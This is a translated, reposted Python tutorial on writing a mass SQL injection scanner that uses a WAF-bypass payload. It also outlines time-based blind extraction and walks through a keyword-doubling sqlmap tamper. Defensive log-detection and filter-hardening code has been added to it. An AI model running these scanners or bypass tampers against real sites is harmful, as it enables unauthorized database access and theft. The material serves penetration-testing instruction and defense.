[PyHacker Writing Guide] Writing SQL Injection Scripts

This lesson is "Writing SQL Injection Scripts" from the 巡安似海 PyHacker Writing Guide.

Some injection points cannot be confirmed by sqlmap. A typical case is time-based injection where the delay actually observed does not match the delay requested in the statement; sqlmap then reports nothing, and we have to write our own script that fits the situation. The end of the article covers writing sqlmap tampers, so some Python background is needed to follow along.

Anyone who likes writing scripts in Python can follow along and write it together.

Environment: Python 2.x

**00x1:**
Modules needed:

```python
import requests
import re
```

**00x2:** Writing the SQL injection check

First we need a payload, ideally one that bypasses filtering, so that testing is convenient:

```
?a=/*&id=1%20and%201=1%23*/
```

```python
url = 'http://127.0.0.1/index.php?id=1'
r = r'\?(.*)'
id = re.findall(r, url)
id = id[0]
payload = "?a=/*&{}%20and%201=1%23*/".format(id)
```

![[PyHacker Writing Guide] Writing SQL Injection Scripts](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183508379-1553913963.png)

OK, it prints as expected. Next, match the part of the URL in front of the query string and join it with the payload, which gives a clean bypass:

![[PyHacker Writing Guide] Writing SQL Injection Scripts](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183603197-320471570.png)

Tidying up the code:

```python
def url_bypass(url):
    r = r'\?(.*)'
    id = re.findall(r, url)
    id = id[0]
    payload = "?a=/*&{}%20and%201=1%23*/".format(id)

    urlr = r'(.*)\?%s' % id
    url_ = re.findall(urlr, url)
    url_ = url_[0]
    print url_ + payload

url = 'http://127.0.0.1/index.php?id=1'
url_bypass(url)
```

Store the result in a list, and we can iterate over it later.

**00x3:**
Now for the detection principle:

```
?a=/*&id=1%20and%201=1%23*/    returns the normal page
?a=/*&id=1%20and%201=2%23*/    returns an error

xor 1=1    returns an error
xor 1=2    returns the normal page
```

If response 1 != response 2, an SQL injection vulnerability exists (either pair of statements above can be used for the test). We use two separate requests so that the code stays easy to read:

```python
def req1(url):
    global html1
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url, headers=headers, verify=False, timeout=3)
    html1 = req.content

def req2(url):
    global html2
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url, headers=headers, verify=False, timeout=3)
    html2 = req.content
```

**00x4:**
Detecting the SQL injection vulnerability:

```python
def main():
    req1(urls[0])
    req2(urls[1])
    if html1 != html2:
        print "[+] Find SQL"
    else:
        print "NO"
```

Debugging it:

![[PyHacker Writing Guide] Writing SQL Injection Scripts](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183616667-2143386092.png)

**00x5:**
Together with the earlier tutorials we can already collect URLs and crawl them in depth. Collection is not covered here; gather some URLs yourself. Iterate over the URLs and test each one for SQL injection:

```python
if __name__ == '__main__':
    f = open('url.txt', 'r')
    for url in f:
        url = url.strip()
        url_bypass(url)  # build the test URLs
        main()           # test for SQL injection
        urls = []        # reset the list
```
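As an added example from the detection side (not code from the original post): the script above always sends a true (1=1) and a false (1=2) comparison wrapped in the same `/* ... #*/` comment trick, which is a recognisable shape in web server logs. This scanner URL-decodes each request line, matches that probe shape, and reports clients that sent both halves of the differential test. The log format and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed log lines in a minimal "client request status" format (not from the page);
# client 10.0.0.9 sends the two probes that url_bypass() above would generate.
SAMPLE_LOG = """\
10.0.0.5 "GET /index.php?id=1 HTTP/1.1" 200
10.0.0.9 "GET /index.php?a=/*&id=1%20and%201=1%23*/ HTTP/1.1" 200
10.0.0.9 "GET /index.php?a=/*&id=1%20and%201=2%23*/ HTTP/1.1" 200
10.0.0.7 "GET /news.php?id=2 HTTP/1.1" 200
"""

LOG_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})')

# Shape of the probe the script sends: an opening /* in one parameter, a boolean
# test "and 1=1" or "and 1=2", a '#' line comment, and the closing */.
PROBE_RE = re.compile(r"/\*.*\b(and|or|xor)\s+1\s*=\s*([12])\s*#.*\*/", re.IGNORECASE)


def parse_probes(log_text):
    """Return (client, compared_value) for each request whose decoded path matches PROBE_RE."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.group(1), unquote(m.group(2))  # decode %20, %23, ...
        hit = PROBE_RE.search(path)
        if hit:
            probes.append((client, hit.group(2)))
    return probes


def boolean_probe_pairs(log_text):
    """Clients that sent both the true (1=1) and the false (1=2) comparison:
    the two-request differential check described in 00x3/00x4."""
    seen = {}
    for client, value in parse_probes(log_text):
        seen.setdefault(client, set()).add(value)
    return sorted(c for c, values in seen.items() if {"1", "2"} <= values)


if __name__ == "__main__":
    print("differential-probe clients:", boolean_probe_pairs(SAMPLE_LOG))
```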

I won't write out automatic output of the results; as mentioned earlier, you can adapt it to your own needs.

**00x6:**
Full code:

```python
#!/usr/bin/python
# -*- coding:utf-8 -*-
import requests
import re
import urllib3

urllib3.disable_warnings()

urls = []

def url_bypass(url):
    # extract the query string (e.g. "id=1") and the part of the URL before it
    id = re.findall(r'\?(.*)', url)[0]
    url_ = re.findall(r'(.*)\?%s' % id, url)[0]
    # two test URLs: a true comparison (1=1) and a false one (1=2)
    payload = "?a=/*&{}%20and%201=1%23*/".format(id)
    payload2 = "?a=/*&{}%20and%201=2%23*/".format(id)
    urls.append(url_ + payload)
    urls.append(url_ + payload2)

def req1(url):
    global html1
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url, headers=headers, verify=False, timeout=3)
    html1 = req.content

def req2(url):
    global html2
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url, headers=headers, verify=False, timeout=3)
    html2 = req.content

def main():
    try:
        req1(urls[0])
        req2(urls[1])
        if html1 != html2:
            print "[+] Find SQL", urls[1]
        else:
            pass
    except Exception:
        pass  # request errors and malformed URLs are skipped

if __name__ == '__main__':
    f = open('url.txt', 'r')
    for url in f:
        url = url.strip()
        url_bypass(url)  # build the test URLs
        main()           # test for SQL injection
        urls = []        # reset the list
```

Only the detection logic is written out here; operations such as guessing the database name work the same way. This is just a starting point: swap in a different SQL statement and use a for loop. General idea (time-based injection to read the database):

```python
payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
```

Iterate over payloads and measure the delay with time; if the response takes longer than some threshold, the character is present. As an outline:

```
for x in payloads:
    url + "and if(length(user)=%s,3,0)" % x
```

**PyHacker: writing a SQLMAP tamper**

A tamper is one of a set of scripts that extend sqlmap; its main job is to make specific changes to the original payload in order to bypass a WAF. A simple tamper:

```python
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    return payload.replace("'", "\\'").replace('"', '\\"')
```

We only need to modify two parts:

Priority: defines the script's priority (the default LOWEST is fine).
tamper: the main function; it receives payload and kwargs.

The return value is the rewritten payload. In this example the quotes are escaped with a backslash.

```python
def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["X-originating-IP"] = "127.0.0.1"
    return payload
```

This one sets X-originating-IP to bypass a WAF. So we only need to imitate these and adjust them to write our own tamper.

Let's test it. We modify the target's source code so that the keyword is replaced with an empty string:

![[PyHacker Writing Guide] Writing SQL Injection Scripts](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183835324-1964642969.png)

OK, no problem. Since the keyword is simply deleted, we can bypass the filter with a doubled keyword such as seleselectct:

![[PyHacker Writing Guide] Writing SQL Injection Scripts](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183842330-176649289.png)

Test it:

```
Sqlmap.py -u "http://127.0.0.1/news.php?id=1" --purge
```

Nothing can be extracted any more, so let's write a tamper.


Use the replace function to substitute the characters.


Full tamper:

```python
#!/usr/bin/python
# -*- coding:utf-8 -*-
# standard header
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW  # priority (LOWEST is the lowest level)

# optional
def dependencies():
    pass

def tamper(payload, **kwargs):
    payload = payload.replace('and', 'anandd')
    payload = payload.replace('xor', 'xoxorr')
    payload = payload.replace('select', 'selselectect')
    payload = payload.replace('union', 'uniunionon')
    payload = payload.replace('if', 'iiff')
    return payload
```

Put it in the tamper directory:

```
Sqlmap.py -u "http://127.0.0.1/news.php?id=1" --purge --tamper "andand.py"
```

OK, the injection works again.
The approach is always much the same: understand the WAF's characteristics and fuzz for a bypass.
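As an added, defender-side example (not code from the original post), this models the single-pass keyword deletion performed by the test filter above, shows why the doubled keywords from the tamper collapse back into real keywords after one pass, and gives two ways to handle it: stripping to a fixed point, and flagging inputs in which a keyword only appears after the first pass. The keyword list and the sample query strings are constructed.

```python
import re

# Constructed keyword list: the five words the page's tamper doubles.
KEYWORDS = ("select", "union", "and", "xor", "if")


def strip_once(value):
    """One deletion pass per keyword, like the simulated filter in the post:
    every occurrence of each keyword is removed, but only in a single pass."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def strip_to_fixed_point(value):
    """Repeat the deletion pass until the input stops changing, so a keyword
    reassembled from the halves of a doubled keyword is removed as well."""
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return value
        value = stripped


def doubled_keywords(value):
    """Keywords present only *after* one strip pass. Benign input almost never
    behaves like this, so a non-empty result is a strong evasion signal."""
    once = strip_once(value)
    return [kw for kw in KEYWORDS if re.search(kw, once, re.IGNORECASE)]


def scan(query_strings):
    """(query, reassembled keywords) for each query that survives the
    single-pass filter with a real keyword intact."""
    return [(q, doubled_keywords(q)) for q in query_strings if doubled_keywords(q)]


# Constructed sample query strings: a benign one, a plain probe that the
# single-pass filter does catch, and two outputs of the keyword-doubling tamper.
SAMPLE_QUERIES = [
    "id=1",
    "id=1 and 1=1",
    "id=1 anandd 1=1",
    "id=1 uniunionon selselectect 1,2",
]

if __name__ == "__main__":
    for query, kws in scan(SAMPLE_QUERIES):
        print("evasion: %r reassembles %s after one pass" % (query, kws))
```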


Original: https://www.cnblogs.com/XunanSec/p/pyhacker_sql.html
Author: 巡安似海
Title: [PyHacker Writing Guide] Writing SQL Injection Scripts

Original articles are protected by copyright. Please cite the source when reposting: https://www.johngo689.com/499559/
